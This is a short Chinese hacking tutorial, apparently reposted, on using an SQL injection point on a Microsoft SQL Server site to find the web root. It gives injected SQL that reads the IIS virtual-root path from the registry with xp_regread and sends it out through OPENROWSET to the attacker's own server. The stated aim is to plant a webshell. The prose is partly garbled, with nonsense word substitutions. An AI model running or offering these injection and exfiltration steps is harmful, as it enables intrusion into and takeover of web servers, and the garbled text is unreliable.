渗入选用openrowset搞shell的方式  
获得SQL引入点,最先想起的是BACKUP WEBSHELL,扔在NB里跑一圈,发觉屏蔽掉SQL错误报告,无法得到物理路径,那还写个PP马了.
想到到一个管理权限并不是很高的指令openrowset,开展跨库服务器查询,便是把一个SQL指令发送至远程控制数据库查询,随后看回到的結果,可是要启动事件追踪!我们可以把网址信息内容载入数据库查询,随后%$^%$@#$@^%$~
最先在自身机器创建SQL数据库查询 

随后在另一方机器上创建个表 create table [dbo].[fenggou]([cha8][char](255))--

在另一方执行 DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into fenggou (cha8) values('select a.* FROM OPENROWSET(''SQLOLEDB'',''自身的IP'';''sa'';''你的登陆密码'', ''select * FROM pubs.dbo.authors where au_fname='''''   @result   ''''''')AS a');--

那样fenggou这一表中就会有那样一条纪录select a.* FROM OPENROWSET('SQLOLEDB','自身的IP';'sa';'你的登陆密码', 'select * FROM pubs.dbo.authors where au_fname=''D:\WEB,,1''')AS a

别说,''D:\WEB"就是以注册表文件里读取的物理路径拉.随后执行DECLARE @a1 char(255) set @a1=(select cha8 FROM fenggou) exec (@a1);--

相当于执行了select a.* FROM OPENROWSET('SQLOLEDB','自身的IP';'sa';'你的登陆密码', 'select * FROM pubs.dbo.authors where au_fname=''D:\WEB,,1''')AS a

OK,这时候你一直在你机器上SQL恶性事件跟踪器上就会显示信息select * FROM pubs.dbo.authors where au_fname='D:\WEB,,1' 
哇 啊哈哈哈 物理路径拿到了 写小龙传马来西亚吧~